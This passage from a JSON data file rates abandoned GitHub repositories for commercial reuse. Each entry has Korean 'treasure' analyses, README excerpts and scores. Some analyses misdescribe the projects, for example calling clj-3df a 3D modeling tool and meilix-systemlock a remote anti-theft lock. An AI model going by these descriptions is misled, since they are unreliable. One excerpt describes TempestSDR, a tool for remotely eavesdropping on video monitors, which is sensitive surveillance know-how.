운영\n2. **내부 업무 도구**: 회사 직원들의 업무 질문에 자동으로","readme_excerpt":"# Susi Kik Bot\n\nThis repository holds a Kik bot for [SUSI AI](https://github.com/fossasia/susi_server) made with Nodejs. [Kik](https://www.kik.com/) is a messenger services.\n\n[![Build Status](https://travis-ci.org/fossasia/susi_kikbot.svg?branch=master)](https://travis-ci.org/fossasia/susi_kikbot)\n[![CircleCI](https://img.shields.io/circleci/project/fossasia/susi_kikbot.svg?maxAge=2592000?style=flat-square)](https://circleci.com/gh/fossasia/susi_kikbot)\n[![Code Climate](https://codeclimate.com/github/fossasia/susi_kikbot/badges/gpa.svg)](https://codeclimate.com/github/fossasia/susi_kikbot)\n[![codecov](https://codecov.io/gh/fossasia/susi_kikbot/branch/development/graph/badge.svg)](https://codecov.io/gh/fossasia/susi_kikbot)\n[![Join the chat at https://gitter.im/fossasia/susi_server](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/fossasia/susi_server)\n\n ![susi kik](./docs/images/example.jpg \"susi kik\")\n\n## Installation Info\n\nTo setup the susi kik bot, check out the [install","composite_score":0.4012,"license_safety_tag":"restricted"},{"name":"fossasia/susi_gitterbot","github_url":"https://github.com/fossasia/susi_gitterbot","stars":12,"language":"JavaScript","license":"LGPL-2.1","abandonment_months":96,"description":"# fossasia/susi_gitterbot 분석\n\n## 왜 보물인가\n채팅 플랫폼에서 자동으로 질문에 답변하는 AI 봇으로, 고객 응대나 커뮤니티 관리 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업들이 자신의 채팅 채널에 설치하여 고객 FAQ 자동 응답 서비스 제공\n2. **내부 업무 도구**: 회사 직원들","readme_excerpt":"# Getting Started : Gitter Susi AI Bot Installation \n\nCreate a github or twitter account. Now you need to sign in to Gitter with a twitter or github account from [here](https://gitter.im). \n\nWe will be using the streaming API of Gitter to deploy SUSI chat bot to Gitter. You can read the [documentation](https://developer.gitter.im/docs/streaming-api) and get familiar with the API.\n\n[![Deploy to Docker Cloud](https://files.cloud.docker.com/images/deploy-to-dockercloud.svg)](https://cloud.docker.com/stack/deploy/?repo=https://github.com/fossasia/susi_gitterbot)\n\n## Prerequisites\nTo create your account on -:\n1. Github\n2. Gitter\n3. Heroku\n\n## SUSI.AI Gitter messenger bot\n\nFeel free to play around with the already built [SUSI.AI bot](https://gitter.im/susiaitest/Lobby) on Gitter. This room will reply to the queries when mentioned with \"@susiai\". So we can try asking SUSI.AI our queries, for example - @susiai BTC to INR [here](https://gitter.im/susiaitest/Lobby).\n\n## Setup your own Messenger ","composite_score":0.4011,"license_safety_tag":"restricted"},{"name":"fossasia/pslab-expeyes","github_url":"https://github.com/fossasia/pslab-expeyes","stars":11,"language":"Python","license":"GPL-3.0","abandonment_months":82,"description":"# PSLab ExpEyes 프로젝트 분석\n\n## 왜 보물인가\n과학 실험을 쉽게 할 수 있게 도와주는 저렴한 계측 도구로, 학교나 연구기관에서 비싼 장비를 대체할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 과학 교육 플랫폼**: 학생들이 집에서 실험하도록 돕는 구독형 강의 서비스\n2. **과학관·박물관 체험 프로그램**: 방문객을 위한 실험 ","readme_excerpt":"# Pocket Science Lab ExpEYES\n\nRepository for additional applications and sensor plugins to perform experiments with ExpEYES using Pocket Science Lab. \n\n[![Build Status](https://travis-ci.org/fossasia/pslab-expeyes.svg?branch=master)](https://travis-ci.org/fossasia/pslab-expeyes)\n[![Codacy Badge](https://api.codacy.com/project/badge/Grade/18fad6e7f96a49fe8ec531ad40149664)](https://www.codacy.com/app/mb/pslab-expeyes?utm_source=github.com&amp;utm_medium=referral&amp;utm_content=fossasia/pslab-expeyes&amp;utm_campaign=Badge_Grade)\n[![Mailing List](https://img.shields.io/badge/Mailing%20List-FOSSASIA-blue.svg)](https://groups.google.com/forum/#!forum/pslab-fossasia)\n[![Gitter](https://badges.gitter.im/fossasia/pslab.svg)](https://gitter.im/fossasia/pslab?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)\n[![Twitter Follow](https://img.shields.io/twitter/follow/pslabio.svg?style=social&label=Follow&maxAge=2592000?style=flat-square)](https://twitter.com/pslabio)\n\nThis repository holds ","composite_score":0.401,"license_safety_tag":"restricted"},{"name":"rtlsdrblog/TempestSDR","github_url":"https://github.com/rtlsdrblog/TempestSDR","stars":8,"language":"C","license":"GPL-3.0","abandonment_months":103,"description":"# TempestSDR 분석 보고서\n\n## 왜 보물인가\n무선 신호를 감지하여 화면의 전자기 방출을 원거리에서 감지할 수 있는 기술로, 보안 연구나 신호 분석이 필요한 전문가들에게 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **보안 검사 SaaS**: 기업의 무선 보안 취약점을 진단해주는 온라인 서비스\n2. **정부 기관 내부 도구**: 국방부, 통신","readme_excerpt":"TempestSDR\n=============\n\nThis project is a software toolkit for remotely eavesdropping video monitors using a Software Defined Radio (SDR) receiver. It exploits compromising emanations from cables carrying video signals.\n\nRaster video is usually transmitted one line of pixels at a time, encoded as a varying current. This generates an electromagnetic wave that can be picked up by an SDR receiver. The software maps the received field strength of a pixel to a gray-scale shade in real-time. This forms a false colour estimate of the original video signal.\n\nThe toolkit uses unmodified off-the-shelf hardware which lowers the costs and increases mobility compared to existing solutions. It allows for additional post-processing which improves the signal-to-noise ratio. The attacker does not need to have prior knowledge about the target video display. All parameters such as resolution and refresh rate are estimated with the aid of the software. \n\nThe software consists of a library written in C, ","composite_score":0.401,"license_safety_tag":"restricted"},{"name":"fossasia/meilix-artwork","github_url":"https://github.com/fossasia/meilix-artwork","stars":12,"language":"Shell","license":"GPL-3.0","abandonment_months":88,"description":"# Meilix Artwork 저장소 분석\n\n## 왜 보물인가\n오픈소스 운영체제의 공식 디자인 자산을 모아놓은 곳으로, 브랜드 일관성이 필요한 프로젝트들이 무료로 활용할 수 있는 디자인 자료실입니다.\n\n## 어디에 쓸 수 있나\n1. **디자인 자산 구독 서비스**: 오픈소스 프로젝트나 스타트업들이 매월 정리된 아이콘, 로고, 배너를 구독으로 이용하는 서비스","readme_excerpt":"# meilix-artwork\n\n[![Join the chat at https://gitter.im/fossasia/meilix](https://badges.gitter.im/fossasia/meilix.svg)](https://gitter.im/fossasia/meilix?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge) [![Build Status](https://travis-ci.org/fossasia/meilix.svg?branch=master)](https://travis-ci.org/fossasia/meilix-artwork)\n\n## Getting Started:\n- If you're new to this and want more information, visit [this link](https://wireframesketcher.com/support/install/installing-deb-package-on-ubuntu-debian.html) to better understand debian package installing. \n- Understand the working of Travis [here](https://docs.travis-ci.com/)\n\nmeilix-artwork comprises the sources for the two plymouth bootscreen theme packages for Meilix, one for logo, one for text based startup screen. These two packages should be installable/testable on any Debian or Ubuntu derivate system and could be configured as the default boot screen.\n- plymouth-theme-meilix-logo_1.0-1_all.deb \n- plymouth-them","composite_score":0.401,"license_safety_tag":"restricted"},{"name":"fossasia/MMM-SUSI-AI","github_url":"https://github.com/fossasia/MMM-SUSI-AI","stars":12,"language":"TypeScript","license":"LGPL-2.1","abandonment_months":107,"description":"# MMM-SUSI-AI 저장소 분석\n\n## 왜 보물인가\n스마트 미러나 음성 인식 디바이스에 인공지능 비서 기능을 간단하게 추가할 수 있는 오픈소스 모듈입니다.\n\n## 어디에 쓸 수 있나\n1. **스마트홈 디바이스 제조업체**: 자체 제품에 AI 음성 기능을 탑재하고 프리미엄 서비스로 판매\n2. **기업용 안내 시스템**: 병원, 은행, 공항의 음성 안내 ","readme_excerpt":"# Susi Magic Mirror Module\n\n[![Build Status](https://travis-ci.org/fossasia/MMM-SUSI-AI.svg?branch=master)](https://travis-ci.org/fossasia/MMM-SUSI-AI)\n\nSUSI.AI Module for Magic Mirror Project\n\nThis project aims at creating a Magic Mirror Module to provide intelligent answers via Susi directly on your Magic Mirror.\n\nMagic Mirror Project: https://github.com/MichMich/MagicMirror\n\n## Current Status\n\nCurrently, magic mirror module for Susi is in working state. You can invoke Susi via hotword 'Susi' and ask any query,\nSusi will reply back with answer. Notably,\n\n- Hotword Detection is working via Snowboy Hotword Detection\n- Speech Recognition is Working via Microsoft Cognitive Services: Bing Speech API\n- Text to Speech is working via Bing Text to Speech.\n- Answer and Map Action Type by Susi API Working.\n- Authentication with Face Recognition with MMM-Facial-Recognition module.\n\n## Next Steps\n\n- Add better visualization support in module\n- Display data by various action types on Mirror Screen","composite_score":0.401,"license_safety_tag":"restricted"},{"name":"fossasia/meilix-systemlock","github_url":"https://github.com/fossasia/meilix-systemlock","stars":11,"language":"Python","license":"GPL-3.0","abandonment_months":90,"description":"# fossasia/meilix-systemlock 상업화 분석\n\n## 왜 보물인가\n컴퓨터를 분실했을 때 원격으로 잠금을 걸어 개인정보를 보호하는 기술로, 노트북/태블릿 분실 시 필수 보안 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 자산 관리 SaaS**: 회사 지급 노트북 도난 방지 및 원격 잠금 서비스\n2. **보험사 부가 서비스**: 분실","readme_excerpt":"# systemlock\n\n[![Build Status](https://travis-ci.org/fossasia/meilix-systemlock.svg?branch=master)](https://travis-ci.org/fossasia/meilix-systemlock)\n[![Join the chat at https://gitter.im/fossasia/meilix](https://badges.gitter.im/fossasia/meilix.svg)](https://gitter.im/fossasia/meilix?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\n## Meilix system lock\n\nIt just freezes the system whenever it is executed.\n\n## Communication\nChat: https://gitter.im/fossasia/meilix\n\n## Contributions, Bug Reports, Feature Requests\n\nThis is an Open Source project and we would be happy to see contributors who report bugs and file feature requests submitting pull requests as well. Please report issues in the GitHub tracker.\n\n## Branch Policy\n\nWe have the following branches\n * **master**\n\t All development goes on in the master branch. If you're making a contribution,\n\t you are supposed to make a pull request to _master_.\n\t PRs to the branch must pass a build check and a unit-test ch","composite_score":0.4009,"license_safety_tag":"restricted"},{"name":"fossasia/susi_alexa_skill","github_url":"https://github.com/fossasia/susi_alexa_skill","stars":12,"language":"JavaScript","license":"LGPL-2.1","abandonment_months":61,"description":"# SUSI Alexa Skill 상용화 분석\n\n## 왜 보물인가\n아마존 알렉사(음성 비서)를 통해 SUSI라는 AI 질문-답변 엔진을 사용할 수 있게 만든 기술로, 음성 기반 AI 서비스를 쉽게 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **스마트홈 회사의 SaaS 서비스**: 삼성, LG 같은 가전사가 자체 음성 비서에 SUSI를 통합하여 고","readme_excerpt":"# Susi_Alexa_Skill\nAn alexa skill which can be used to ask susi for answers like: \"Alexa, Ask Susi Who Are You\" or \"Alexa, Ask Susi what is the temperature in berlin\"\n\n# Getting Started : Alexa Susi AI Skill \n\nFollow the instructions below:\n\nVisit [Amazon developer site](https://developer.amazon.com) and Login.\n\nClick Alexa, on the top bar.\n\nClick Alexa skills kit.\n\n<img src=\"./docs/images/alexaSkillsKit.PNG\" alt=\"alt text\">\n\nClick on add a new skill button on the top right of the page.\n\nWe will be at the skill information tab.\n\n<img src=\"./docs/images/alexaSkill.PNG\" alt=\"alt text\">\n\nWrite the name of the skill\nWrite the invocation name of the skill i.e. the name that will be used to trigger your skill. \nLike in our case, if we need to ask anything(as we have 'susi' as the invocation name), we will ask with \"Alexa, ask Susi\" as a prefix to our question sentence.\n\nBy clicking next, we will be redirected to the second tab i.e. Interaction model.\nWe need to fill two fields here i.e. inte","composite_score":0.4009,"license_safety_tag":"restricted"},{"name":"fossasia/loklak_scraper_js","github_url":"https://github.com/fossasia/loklak_scraper_js","stars":12,"language":"JavaScript","license":"LGPL-2.1","abandonment_months":87,"description":"# fossasia/loklak_scraper_js 분석\n\n## 왜 보물인가\n인터넷에 흩어져 있는 정보를 자동으로 모아서 정리해주는 도구로, 뉴스, SNS, 블로그 등에서 필요한 데이터를 빠르게 수집할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 마케팅팀을 위한 경쟁사 뉴스 자동 모니터링 플랫폼 제공\n- **내부 업무 도구**: 회","readme_excerpt":"# loklak_scraper_js\nScrapers for loklak in javascript\n\nThe idea is, that loklak and its scrapers (i.e. in loklak_server, loklak_wok, a possible loklak_wok_ios and a possible scraper in a web page integration) all use the same common code base.\n\nThat code shall be placed here in the `scraper` subdirectory. Each file in that subdirectory should be named by the scraper target (like `twitter.js`)\n\nExecution of the scrapers must output a json very like to a loklak search result - without the enrichments that the scrapers also implement. I.e. there is no need to integrate a link de-shortener, that must be implemented in the loklak application itself.\n\n## Example\nThere is an example file scrapers/example.js which has just a static output of a json object. You would just have to implement the same behavior for the other scrapers.\n\nI.e.:\n```\nnode scrapers/example.js\n```\n\noutputs a json object. all other scrapers must do the same but just take a query attribute.\n\n## Installing dependencies\nThis ","composite_score":0.4009,"license_safety_tag":"restricted"},{"name":"chr15m/flk","github_url":"https://github.com/chr15m/flk","stars":18,"language":"Shell","license":"MPL-2.0","abandonment_months":54,"description":"","readme_excerpt":"<p align=\"center\">\n  <img src=\"docs/wordmark.svg?sanitize=true\" alt=\"Fleck wordmark\"><br/>\n  Fleck is a Clojure-like LISP that runs wherever Bash is.\n</p>\n\n<p align=\"center\"><img src=\"docs/screencast.svg?sanitize=true\" alt=\"Fleck screencast\"></p>\n\n# Note\n\nThis project is experimental and I am no longer actively working on it.\nIf you need a feature or bug fixed, please send a PR with passing tests and I will review and merge it.\n\nThank you.\n\n# Get it\n\n```shell\ncurl -s https://chr15m.github.io/flk/flk > flk && chmod 755 flk\n./flk\n```\n\n### [Examples](./examples) | [Reference](#reference) | [Contributing](#contributing) | [FAQ](#faq) | [make-a-lisp](https://github.com/kanaka/mal)\n\n# What?\n\n```\n$ echo '(println \"Hello world!\") (println \"Hostname:\" (sh* \"hostname\")))' > example.clj\n$ ./flk example.clj\nHello world!\nHostname: diziet\n```\n\n# Why?\n\nNow you can use a humble LISP to do Bash things.\nBash as a scripting language has many edges, but it is everywhere.\nFleck attempts to round off the ed","composite_score":0.4009,"license_safety_tag":"unknown"},{"name":"miserableworldofit/miserable-world-of-it","github_url":"https://github.com/miserableworldofit/miserable-world-of-it","stars":25,"language":"","license":"LGPL-3.0","abandonment_months":68,"description":"","readme_excerpt":"# miserable-world-of-it\n**IT悲惨世界--记录 IT 圈的悲惨事件**\n\n此 repo 主要记录发生在 IT 行业过的一些悲惨事件，`前人之鉴，后人之师`；希望 it 朋友们吸取前人教训，提高自身经验！\n\n**与[programmer-job-blacklist](https://github.com/shengxinjing/programmer-job-blacklist)的区别？**  \n此 repo 不但有公司无视劳动法霸凌员工这类悲惨事件记录，也有员工自身原因导致的悲剧，如：劳累猝死、因感情纠纷自杀、触犯法律等，只要是发生在 it 人的悲剧都会记录\n\n**此 repo 的记录事件可靠吗？**  \n本 repo 只引用现有知名新闻网站的报导，不对内容真实性负责；置疑真实性的请找源头新闻网站。\n\n**为什么按照时间顺序整理？**  \n按照类型分类整理工作量大，我更倾向于《资治通鉴》这样编年体的记录方式，方便！\n\n**如何参与这个项目**  \n提 issue(建议注册小号)，附上相关新闻网站url\n\n**其他推荐项目**  \n[programmer-job-blacklist](https://github.com/shengxinjing/programmer-job-blacklist)  \n[996_list](https://github.com/fengT-T/996_list)  \n[996.ICU](https://github.com/996icu/996.ICU)  \n[955.WLB ](https://github.com/formulahendry/955.WLB)  \n[996.LAW ](https://github.com/Y1ran/996.Law)  \n[996.TSC ](https://github.com/lxlxw/996.TSC)  \n[1075work](https://github.com/bj4096/1075work)  \n\n## 正文\n**2004**  \n[华为公司前员工被拘事件始末](http://it.sohu.com/20041117/n223028019.shtml)  \n\n**2008**  \n[第37位!华为成都再有员工跳楼自杀身亡](http://www.xker.c","composite_score":0.4009,"license_safety_tag":"restricted"},{"name":"WangYves/Debian_Pythonworkstation","github_url":"https://github.com/WangYves/Debian_Pythonworkstation","stars":16,"language":"","license":"GPL-3.0","abandonment_months":103,"description":"# Debian_Pythonworkstation 상용화 분석\n\n## 왜 보물인가\nLinux 시스템에서 Python 프로그래밍 환경을 자동으로 설정해주는 도구로, 프로그래머가 복잡한 초기 설정 시간을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **내부 업무 도구**: IT 부서가 신입 개발자에게 업무용 컴퓨터를 셋업할 때, 이 도구로 모든 필","readme_excerpt":"","composite_score":0.4009,"license_safety_tag":"restricted"},{"name":"probcomp/metaprob","github_url":"https://github.com/probcomp/metaprob","stars":6,"language":"JavaScript","license":"GPL-3.0","abandonment_months":46,"description":"# Metaprob 저장소 분석\n\n## 왜 보물인가\n불확실한 상황에서 최선의 판단을 내려야 하는 AI 시스템을 만들 수 있는 소프트웨어 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **의료 진단 SaaS**: 환자 증상으로부터 질병 확률을 자동 계산하는 웹 서비스로 의료기관에 월 구독료 판매\n2. **금융사 내부 도구**: 은행의 신용 리스크 평가 시스템","readme_excerpt":"# Metaprob\n\n[![Build Status](https://travis-ci.org/probcomp/metaprob.svg?branch=master)](https://travis-ci.org/probcomp/metaprob)\n![Stability: Experimental](https://img.shields.io/badge/stability-experimental-orange.svg)\n\nA language for probabilistic programming and metaprogramming, embedded in [Clojure](https://clojure.org/).\n\n**Note: Metaprob is currently an unstable research prototype, with little documentation and low test coverage. Also, future versions may not be backwards compatible with this version. We do not recommend using it for any purpose other than basic research, and are not yet able to support users outside of the MIT Probabilistic Computing Project.**\n\n## Key features\n\n* Models can be represented via generative code, i.e. ordinary code that makes stochastic choices\n* Models can also be represented via approximations, e.g. importance samplers with nontrivial weights\n* Custom inference algorithms can be written in user-space code, via reflective language constructs for:","composite_score":0.4008,"license_safety_tag":"restricted"},{"name":"pallets/flask","github_url":"https://github.com/pallets/flask","stars":71544,"language":"Python","license":"BSD-3-Clause","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.4008,"license_safety_tag":"safe"},{"name":"fossasia/susi_gassistantbot","github_url":"https://github.com/fossasia/susi_gassistantbot","stars":12,"language":"JavaScript","license":"LGPL-2.1","abandonment_months":98,"description":"# SUSI 음성 비서봇 상용화 분석\n\n## 왜 보물인가\nGoogle Assistant나 Alexa 같은 음성 AI 비서를 자신의 플랫폼에 맞게 커스터마이징해서 만들 수 있는 오픈소스 기반 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소규모 전자상거래 업체가 자사 고객센터용 음성 챗봇 구독 서비스\n2. **내부 업무 도구**: 대기","readme_excerpt":"## Setup:\n\n1. First of all we will make a project on [developer&#39;s console](https://console.actions.google.com/) of Actions on Google and after that you will set up action on your project using API.AI\n\n![Console](/docs/images/console.png)\n\n2. Above step will open API.AI console create an agent there for the project you created above.\n\n3. Now we have an agent. In order to create SUSI action on Google, we will define an &quot;intent&quot; from options in the left menu on API.AI, but as we have to receive responses from [SUSI API](http://api.susi.ai) so we have to set up webhook first.\n\n![Fulfillment](/docs/images/fulfillment.png)\n\n4.  See &quot;fulfillment&quot; option in the left menu. Open to enable it and to enter the url. We have to deploy the above written code onto heroku, but first make a github repository and push the files in the folder we created above.\n\n    In command line change current directory to folder we created above and  write\n            git init\n            git ad","composite_score":0.4008,"license_safety_tag":"restricted"},{"name":"techwithtim/Beautiful-Soup-Tutorial","github_url":"https://github.com/techwithtim/Beautiful-Soup-Tutorial","stars":5,"language":"HTML","license":"unknown","abandonment_months":20,"description":"# Beautiful-Soup-Tutorial 분석\n\n## 왜 보물인가\n웹사이트의 데이터를 자동으로 수집하고 정리하는 방법을 배울 수 있는 실전 교과서입니다.\n\n## 어디에 쓸 수 있나\n1. **가격 비교 서비스**: 여러 쇼핑몰 가격을 자동으로 모아 사용자에게 보여주는 SaaS\n2. **부동산 정보 수집 도구**: 공인중개소 정보를 자동으로 수집해 직원이","readme_excerpt":"# Beautiful-Soup-Tutorial\n\n# 💻 Launch Your Software Development Career Today!  \n\n🎓 **No degree? No problem!** My program equips you with everything you need to break into tech and land an entry-level software development role.  \n\n🚀 **Why Join?**  \n- 💼 **$70k+ starting salary potential**  \n- 🕐 **Self-paced:** Complete on your own time  \n- 🤑 **Affordable:** Low risk compared to expensive bootcamps or degrees\n- 🎯 **45,000+ job openings** in the market  \n\n👉 **[Start your journey today!](https://techwithtim.net/dev)**  \nNo experience needed—just your determination. Future-proof your career and unlock six-figure potential like many of our students have!  \n","composite_score":0.4008,"license_safety_tag":"unknown"},{"name":"googlesamples/android-architecture","github_url":"https://github.com/googlesamples/android-architecture","stars":9,"language":"Kotlin","license":"Apache-2.0","abandonment_months":0,"description":"# googlesamples/android-architecture 분석\n\n## 왜 보물인가\n스마트폰 앱을 만드는 개발자들이 따라할 수 있는 '설계도'를 구글이 직접 제공하는 것으로, 앱 개발 품질을 획기적으로 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스마트폰 앱 개발 교육 플랫폼으로 구독 서비스 제공 (월 $29~)\n2.","readme_excerpt":"# Android Architecture Samples\n\nThese samples showcase different architectural approaches to developing Android apps. In its different branches you'll find the same app (a TODO app) implemented with small differences.\n\nIn this branch you'll find:\n*   User Interface built with **[Jetpack Compose](https://developer.android.com/jetpack/compose)** \n*   A single-activity architecture, using **[Navigation Compose](https://developer.android.com/jetpack/compose/navigation)**.\n*   A presentation layer that contains a Compose screen (View) and a **ViewModel** per screen (or feature).\n*   Reactive UIs using **[Flow](https://developer.android.com/kotlin/flow)** and **[coroutines](https://kotlinlang.org/docs/coroutines-overview.html)** for asynchronous operations.\n*   A **data layer** with a repository and two data sources (local using Room and a fake remote).\n*   Two **product flavors**, `mock` and `prod`, [to ease development and testing](https://android-developers.googleblog.com/2015/12/leveragi","composite_score":0.4008,"license_safety_tag":"safe"},{"name":"fossasia/sphinx_susiai_theme","github_url":"https://github.com/fossasia/sphinx_susiai_theme","stars":12,"language":"HTML","license":"GPL-3.0","abandonment_months":81,"description":"# Sphinx Susiai Theme 상용화 분석\n\n## 왜 보물인가\n기술 문서를 만드는 도구에 현대적이고 세련된 디자인을 제공하여, 전문가같은 결과물을 쉽게 만들 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기술 문서 자동 생성 플랫폼에서 이 테마를 기본 템플릿으로 제공하여 고객들이 전문적인 문서를 즉시 만들 수 있게 함","readme_excerpt":"# sphinx_susiai_theme\nsphinx_susiai_theme\n","composite_score":0.4008,"license_safety_tag":"restricted"},{"name":"fossasia/susi_cortana_skill","github_url":"https://github.com/fossasia/susi_cortana_skill","stars":12,"language":"JavaScript","license":"LGPL-2.1","abandonment_months":100,"description":"# fossasia/susi_cortana_skill 분석\n\n## 왜 보물인가\n마이크로소프트 코르타나(음성 비서)와 연동하는 스킬 개발 도구로, 누구나 AI 음성 비서 기능을 만들 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업용 음성 비서 플랫폼으로, 기업들이 자신의 고객 지원을 자동화하는 데 사용\n2. **내부 업무 ","readme_excerpt":"# SUSI.AI Cortana Skill\n\n[![Build Status](https://travis-ci.org/fossasia/susi_cortana_skill.svg?branch=master)](https://travis-ci.org/fossasia/susi_cortana_skill)\n\n[Cortana](https://www.microsoft.com/en-us/windows/cortana) is assistant from microsoft just like Siri from Apple. We can make a skill for Cortana i.e Creating your own bot with in cortana so that you can use your bot through cortana by activating it using invocation name. To create SUSI cortana skill we will use [SUSI API](http://api.susi.ai) and Microsoft bot framework. First of all we will have to make a bot on microsoft bot framework and to do so follow this [tutorial](http://blog.fossasia.org/susi-ai-bots-with-microsofts-bot-framework/). Change code in this tutorial with code in app.js\n\nAfter making bot we have to configure this bot for Cortana and to do so select cortana from list of channel on your bot from [https://dev.botframework.com](https://dev.botframework.com) and add following detail shown in figure below.\n\n<im","composite_score":0.4007,"license_safety_tag":"restricted"},{"name":"fossasia/loklak_tweetsearch_android","github_url":"https://github.com/fossasia/loklak_tweetsearch_android","stars":12,"language":"Java","license":"GPL-3.0","abandonment_months":126,"description":"# fossasia/loklak_tweetsearch_android 분석\n\n## 왜 보물인가\n트위터 검색 기능을 스마트폰 앱으로 만든 오픈소스 프로젝트로, SNS 데이터 수집이 필요한 비즈니스에 핵심 기술이 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 소셜미디어 모니터링 플랫폼 - 마케팅 에이전시가 브랜드 평판 관리 서비스로","readme_excerpt":"# Loklak Android App\n\n* An Android Tweet Search App based on  [loklak_wok_android](https://github.com/loklak/loklak_wok_android) libraries.\n* Fetches Results using the TwitterScrapper class.\n\n## Requirements\n>Devices running Android-KitKat 4.4 or greater are supported.<br>\n>Android Studio\n\n## Project setup\n* Download and setup [Android Studio](http://developer.android.com/sdk/index.html)\n* Clone/ download this project. Cloning is recommended if you plan to contribute\n* Navigate to the directory where you saved this project and select the root folder ,and hit OK. \n* Wait for Android Studio to build the project with Gradle.\n* Once the build is complete, you can start playing around!\n*  You can test it by running it on either a real device or an emulated one by going to Run>Run 'app' or presing the Run icon in the toolbar.\n\n## Working\n> ####Type a query and boom!\n<div align =\"Center\">\n<img src =\"https://raw.githubusercontent.com/Yathannsh/LoklakAndroidApp/master/screenshots/hj.gif\"> \n</di","composite_score":0.4007,"license_safety_tag":"restricted"},{"name":"fashiontec/bodyapps-web","github_url":"https://github.com/fashiontec/bodyapps-web","stars":12,"language":"Ruby","license":"LGPL-3.0","abandonment_months":103,"description":"# fashiontec/bodyapps-web 상용화 분석\n\n## 왜 보물인가\n온라인 쇼핑에서 옷이 자신의 몸에 잘 맞는지 미리 확인할 수 있는 기술로, 의류 반품 문제를 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **온라인 의류 판매 플랫폼**: 쿠팡, 무신사 같은 사이트에 가상 피팅 기능 추가하여 고객 만족도 향상\n- **의류 브랜드 ","readme_excerpt":"# bodyapps-web\n\n[![Build Status](https://travis-ci.org/fashiontec/bodyapps-web.svg?branch=master)](https://travis-ci.org/fashiontec/bodyapps-web)\n[![Join the chat at https://gitter.im/fashiontec/bodyapps-web](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/fashiontec/bodyapps-web?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\n## Communication\n\nPlease join our communication channels.\n\nMailing List at: https://groups.google.com/forum/#!forum/bodyapps\n\nGitter chat at: https://gitter.im/fashiontec/bodyapps\n\n## **Software Stack**\nThe software stack for our application includes following technologies:\n\n1. **Server**: Node.js\n\n2. **Database**: MongoDB\n\n3. **Frontend**: Backbone Framework\n\n4. **UI Design**: Twitter BootStrap\n\nWe have used mongoose to access MongoDB database. Mongoose is a wrapper around MongoDB native library which is relatively easy to use rather than native MongoDB drivers.\n\n## Reason behind selecting this software stack\n\n### **Why (","composite_score":0.4006,"license_safety_tag":"restricted"},{"name":"comnik/clj-3df","github_url":"https://github.com/comnik/clj-3df","stars":5,"language":"Clojure","license":"EPL-2.0","abandonment_months":80,"description":"# clj-3df 저장소 분석\n\n## 왜 보물인가\n3D 모델링과 설계 작업을 프로그래밍으로 자동화할 수 있는 도구로, 반복적인 설계 작업을 빠르게 처리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **3D 설계 자동화 SaaS**: 제조업체가 부품 설계를 자동으로 생성하고 검증하는 웹 서비스\n2. **건축/인테리어 내부 도구**: 설계사무소의 도면 자동","readme_excerpt":"# clj-3df\n\n[![Clojars Project](https://img.shields.io/clojars/v/com.sixthnormal/clj-3df.svg)](https://clojars.org/com.sixthnormal/clj-3df)\n\n**This is alpha-quality software, not feature-complete, and not yet\nready for use in production services.**\n\n3DF is best thought of as a pub/sub system in which subscriptions can\nbe arbitrary Datalog expressions. Subscribers register queries with\nthe broker, and data sources (such as Kafka, Datomic, or any other\nsource-of-truth) publish new data to it. All subscriber queries\naffected by incoming data will be notified with a diff, describing how\ntheir results have changed. The Datalog implementation is modeled\nafter [Datomic's query\nlanguage](https://docs.datomic.com/on-prem/query.html) and aims to\nsupport the same set of features.\n\n3DF does this efficiently, thanks to being built on top of\n[differential\ndataflows](https://github.com/frankmcsherry/differential-dataflow). In\nparticular, Differential Dataflow will only compute changes, rather\nthan exe","composite_score":0.4006,"license_safety_tag":"unknown"},{"name":"fossasia/susi_hangoutbot","github_url":"https://github.com/fossasia/susi_hangoutbot","stars":12,"language":"JavaScript","license":"LGPL-2.1","abandonment_months":106,"description":"# SUSI Hangout Bot 상용화 분석\n\n## 왜 보물인가\n구글 행아웃(메신저)에서 자동으로 질문에 답변해주는 AI 챗봇으로, 기업의 고객 응대 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n구글 워크스페이스를 사용하는 중소기업을 위한 \"자동 FAQ 챗봇 서비스\"로 월 구독료를 받고 제공할 수 있습니다.\n\n","readme_excerpt":"# SUSI Google Hangout Bot\n\n[![Build Status](https://travis-ci.org/fossasia/susi_hangoutbot.svg?branch=master)](https://travis-ci.org/fossasia/susi_hangoutbot)\n\n## Setup:\n\n- To set up bot for Google hangouts you will need a gmail account first. If you don&#39;t have a gmail account then [create](https://accounts.google.com/SignUp?hl=en-GB) one as we will need it to set up bot.\n\n- Clone this repository and then we will deploy repository to heroku.\n\n- To deploy your bot to heroku you need an account on [Heroku](https://www.heroku.com/) and after making an account make an app.\n\n<img src=\"./docs/images/login.png\" alt=\"login\">\n\n- Deploy app using github deployment method.\n\n<img src=\"./docs/images/deployment.png\" alt=\"deployment\">\n\n- Select Automatic deployment method.\n\n<img src=\"./docs/images/automatic_deployment.png\" alt=\"automatic_deployment\">\n\n- Go to settings of your app and select config variables and paste your password for bot to this and name it as password. \n\n- Your SUSI 